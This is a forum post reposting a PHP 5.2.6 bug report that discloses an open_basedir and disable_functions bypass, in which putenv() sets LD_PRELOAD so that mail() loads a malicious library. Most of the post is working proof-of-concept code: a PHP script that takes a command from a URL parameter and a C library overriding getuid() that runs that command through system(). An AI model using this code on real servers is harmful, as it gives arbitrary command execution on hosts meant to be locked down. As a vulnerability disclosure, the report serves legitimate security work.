waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
http://aspn.activestate.com/ASPN/Mail/Message/php-dev/3681551
Code: |
From: gat3way at gat3way dot eu
Operating system: Linux
PHP version: 5.2.6
PHP Bug Type: Safe Mode/open_basedir
Bug description: putenv()+mail() allows for open_basedir bypass and "disabled" functionalit
y
Description:
------------
safe_mode is safe, but the mail() function should check environment
variables IMO.
e.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail() calls
/usr/bin/mail if your library exports function like getuid() you can bypass
open_basedir restrictions and restrictions on program execution, etc.
If you need some more info, please contact me at:
gat3way@[...].eu
Milen Rangelov
Reproduce code:
---------------
A PHP script:
<?php
putenv("LD_PRELOAD=/var/www/a.so");
$a=fopen("/var/www/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
mail("a","a","a","a");
$a=fopen("/var/www/.comm1","r");
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a); ?>
A simple library:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;
unsetenv("LD_PRELOAD");
a=fopen("/var/www/.comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a); remove("/var/www/.comm");
rename("/var/www/a.so","/var/www/b.so");
buf=strcat(buf," > /var/www/.comm1");
system(buf);
rename("/var/www/b.so","/var/www/a.so");
free(buf);return 0;
}
Expected result:
----------------
execute arbitrary commands even though we have:
disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www
Actual result:
--------------
The test was successful.
|
|
|